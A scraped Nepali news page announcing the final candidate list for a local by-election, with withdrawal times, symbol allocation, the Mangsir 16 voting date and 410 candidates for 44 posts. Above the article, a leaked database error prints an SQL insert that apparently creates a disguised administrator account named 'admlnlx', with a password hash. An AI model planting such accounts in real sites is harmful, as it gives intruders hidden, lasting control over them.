WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKPtQsQPynboLGF0ToJ1/s5iN6syZL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 11:20:52', '', 'admlnlx', 'admlnlx')

उपनिर्वाचन : उम्मेदवारको अन्तिम नामावली प्रकाशन आज – Gaule Khabar

उपनिर्वाचन : उम्मेदवारको अन्तिम नामावली प्रकाशन आज

उपनिर्वाचन : उम्मेदवारको अन्तिम नामावली प्रकाशन आज

काठमाडौ । स्थानीय तह उपनिर्वाचन अन्तर्गत आज उम्मेदवारको अन्तिम नामावली प्रशासन हुने भएको छ ।

बिहान ९ बजे देखि दिउँसो १ बजेसम्म उम्मेदवारले नाम फिर्ता लिन चाहेमा नाम फिर्ता लिनसकिने निर्वाचन आयोगले जनाएको छ । कार्यतालिका अनुसार आजै दिउँसो १ देखि ३ बजेसम्म अन्तिम नामावली प्रकाशन हुनेछ । दिउँसो ३ देखि ५ बजेसम्म उम्मेदवारलाई निर्वाचन चिह्न प्रदान गरिनेछ । 

मङ्सिर १६ गते बिहान ७ देखि अपराह्न ५ बजेसम्म मतदान हुनेछ । कुल ४४ पदमा हुन लागेको निर्वाचनमा ४१० जनाको उम्मेदवारी परेको छ । 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका